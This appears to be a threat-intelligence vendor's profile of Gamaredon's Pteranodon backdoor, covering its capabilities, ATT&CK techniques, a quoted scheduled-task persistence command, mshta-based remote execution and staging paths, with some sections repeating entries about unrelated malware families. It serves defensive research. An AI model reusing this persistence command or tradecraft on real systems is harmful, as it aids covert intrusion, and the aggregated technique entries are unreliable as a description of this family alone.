Pteranodon
Pteranodon, also tracked as Pterodo, is a custom backdoor and deployment framework used by the Russia-linked Gamaredon threat group (also known as Armageddon/UAC-0010), which Ukrainian authorities have tied to the FSB. By 2016, Gamaredon had shifted from off-the-shelf tooling such as Remote Manipulator System RAT to this custom framework, and later evolved further into a fragmented, modular malware ecosystem. Pteranodon/Pterodo has been used in campaigns targeting Ukrainian state authorities and other Ukrainian government, military, law-enforcement, national security, and critical infrastructure entities.
Documented capabilities include loading additional payloads, executing arbitrary commands, collecting system information, stealing files from local systems and USB drives, capturing screenshots at configurable intervals, and exfiltrating screenshot files and other collected data to command-and-control servers. Reported behavior includes creating subdirectories under %Temp%\reports%, storing screenshot JPEGs under C:\Users<user>\AppData\Roaming\Microsoft\store, scheduling tasks to invoke components for persistence, using malicious VBS files for execution, and using mshta.exe to execute remotely hosted HTA files. It can delete files that interfere with execution, remove temporary files, and self-delete after the initial script runs. The malware also includes anti-detection functionality to identify sandbox environments.
CERT-UA and the Foreign Intelligence Service of Ukraine reported new Pterodo-type modifications on computers of Ukrainian state authorities, describing them as collecting system data, regularly sending it to C2 servers, and awaiting further commands, likely as preparation for cyber attacks. The malware has also been referenced in relation to CrowdStrike’s SpiceyHoney campaign attribution and in reporting on Gamaredon operations against Ukrainian victims. High-confidence indicators and artifacts mentioned in the content include the %Temp%\reports% staging path, the screenshot storage path under AppData\Roaming\Microsoft\store, use of scheduled tasks for persistence, and execution via VBS and remote HTA files through mshta.exe.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Документи ... містили шкідливий код для експлуатації відомої вразливості «Microsoft Office» CVE-2017-0199 ... що надає змогу зловмиснику виконати довільний код на пристрої користувача, при відкритті інфікованого файлу.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group was tied to the FSB by Ukraine’s Security Service, it originally used off-the-shelf tools like Remote Manipulator System RAT, then moved to a custom framework called Pteranodon, and gradually fragmented into a constellation of standalone, modular malware families.
Indicators of Compromise (IoCs):- ... Malware Pterodo Backdoor associated with UAC-0010 (Gamaredon)
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents of mimicking Ukrainian institutions to target government entities.
Execution
7 techniques
Execution
The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Persistence
3 techniques
Persistence
The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
3 techniques
Privilege Escalation
The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
7 techniques
Stealth
"...компіляція UserSupport.cs завдяки csc.exe(компілятор С#)... до UserSupport.exe"
One of the notable features of the malware Interop component is its usage of the fake Microsoft digital certificate belonging to Microsoft Time-Stamp Service.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
Multiple actors and malware families are described as using mshta/mshta.exe (including renamed mshta.exe) to execute malicious scripts/HTA/HTML/VBScript/JavaScript, download and run payloads from remote servers, and in one case help schedule tasks for persistence.
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Discovery
3 techniques
Discovery
"...надає ... інформацію щодо назви пристрою, назви накопичувача та його серійного номеру"
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Collection
4 techniques
Collection
This virus collects system data, regularly sends it to command-control servers and expects further commands.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control
3 techniques
Command and Control
Tool Telegram Used as C2 channel by UAC-0010 and others Tool Telegraph Used for IP-based C2 routing by UAC-0010
Exfiltration
2 techniques
Exfiltration
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
40 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Custom malware framework previously used by Gamaredon before its tooling evolved into more fragmented modular malware families.
A custom-built framework previously used by Gamaredon before its tooling evolved into more fragmented and modular malware variants.
A historical custom backdoor and deployment framework used by Gamaredon. It loaded additional payloads, executed arbitrary commands, captured screenshots, and stole files from local systems and USB drives for exfiltration.
Backdoor associated with UAC-0010 (Gamaredon).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.